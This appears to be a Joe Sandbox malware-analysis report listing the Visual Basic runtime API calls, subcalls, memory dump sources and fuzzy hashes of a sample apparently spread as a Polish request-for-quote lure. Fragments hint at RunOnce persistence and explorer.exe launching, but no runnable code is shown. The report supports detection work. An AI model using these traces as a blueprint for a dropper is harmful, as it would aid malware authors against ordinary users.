                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000), ref: 00425A64
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                                                                                                                                                                                      • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00425AF7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000003), ref: 00425B08
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000), ref: 00425B0B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425B16
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(?,00000000), ref: 00425B1D
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00425B3F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00425B64
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000004,?), ref: 00425B79
                                                                                                                                                                                                                                                      • #618.MSVBVM60(00000000), ref: 00425B7C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425B87
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 00425B8A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000), ref: 00425BA5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00425BB9
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425BCE
                                                                                                                                                                                                                                                      • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00425BD8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425B95
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #594.MSVBVM60(?,6CF8D9F5,-00000001,6CF8D8B1), ref: 0041127A
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                                                                                                                                                                                        • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(0000,?), ref: 00425C10
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425C1B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(0000,?), ref: 00425C2C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425C37
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00425C47
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00425C4C
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425C55
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00425C5A
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00425C72
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00425C81
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?), ref: 00425C8D
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00425C97
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00001000), ref: 00425CA2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425CAD
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425CE3
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425CEC
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425CF4
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425CFD
                                                                                                                                                                                                                                                      • #525.MSVBVM60(?), ref: 00425D29
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00425D34
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425D39
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425D42
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425D4A
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425D53
                                                                                                                                                                                                                                                      • #594.MSVBVM60(0000000A), ref: 00425D77
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00425D80
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00425D9C
                                                                                                                                                                                                                                                      • #593.MSVBVM60(0000000A), ref: 00425DC6
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00425DEF
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00425DFD
                                                                                                                                                                                                                                                      • __vbaFpUI1.MSVBVM60 ref: 00425E1F
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00425E37
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00425E5F
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425EAD
                                                                                                                                                                                                                                                      • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425EB9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                                                                                                                                                                                      • #593.MSVBVM60(0000000A), ref: 00425EF3
                                                                                                                                                                                                                                                      • __vbaFpI4.MSVBVM60 ref: 00425F15
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00425F20
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00425F34
                                                                                                                                                                                                                                                      • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00425F4C
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425F57
                                                                                                                                                                                                                                                      • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425F63
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425F82
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00425F91
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425F95
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425F9E
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425FA3
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00425FAC
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00425FB0
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000), ref: 00425FB3
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 00425FBC
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0042604C), ref: 00426026
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00426035
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0042603A
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0042603F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00426044
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 00426068
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                                                                                                                                                                                      • String ID: 0000
                                                                                                                                                                                                                                                      • API String ID: 292954213-211534962
                                                                                                                                                                                                                                                      • Opcode ID: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
                                                                                                                                                                                                                                                      • Instruction ID: ae26ad25c27fd2aa879063d40509198e82445ba020206e85d6646bf00855608d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF125871E002189FDB14DFE4DD88AEEBBB5FB48301F10412AE506B72A0EB745985CF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0042206E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042209B
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 004220AA
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220C0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220CB
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,Function_000032B6), ref: 004220DD
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220F3
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220FE
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 00425A0A
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0042211F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00408794,00000006,00000006,?,00000000,?,00000000,Function_000032B6), ref: 00422144
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042214F
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,?,00000000,?,00000000,Function_000032B6), ref: 00422156
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042215F
                                                                                                                                                                                                                                                      • #598.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042216C
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(004049C0,0042C060,0042C0F0,?,00000000,?,00000000,Function_000032B6), ref: 0042219D
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 004221D7
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,?), ref: 004221F8
                                                                                                                                                                                                                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0042C0F0,00000000,?,00000020), ref: 0042221E
                                                                                                                                                                                                                                                      • #598.MSVBVM60(?,00000000,Function_000032B6), ref: 0042222E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,Function_000032B6), ref: 00422250
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00408794,?,00000000,?,00000000,Function_000032B6), ref: 0042226C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 00422277
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00000000,?,00000000,Function_000032B6), ref: 00422286
                                                                                                                                                                                                                                                      • #598.MSVBVM60(?,00000000,Function_000032B6), ref: 00422293
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 004222B2
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004222C1
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00408794,?), ref: 004222D7
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(004226E7), ref: 004226D7
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004226E0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                                                                                                                                                                                      • String ID: 5
                                                                                                                                                                                                                                                      • API String ID: 3012955283-2226203566
                                                                                                                                                                                                                                                      • Opcode ID: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
                                                                                                                                                                                                                                                      • Instruction ID: 514902ae826528d268cef2b3f75eb0ca97d7031ef370423ce81c1c411bdef8a6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD02D675900258EFDB04DFA0EE48BEEBB75FF48305F108169E502B72A0DBB45A45DB68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • #600.MSVBVM60(?,00000002), ref: 0040C111
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0040C137
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027), ref: 0040CA1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CA3D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CA62
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CAA4
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CAC8
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
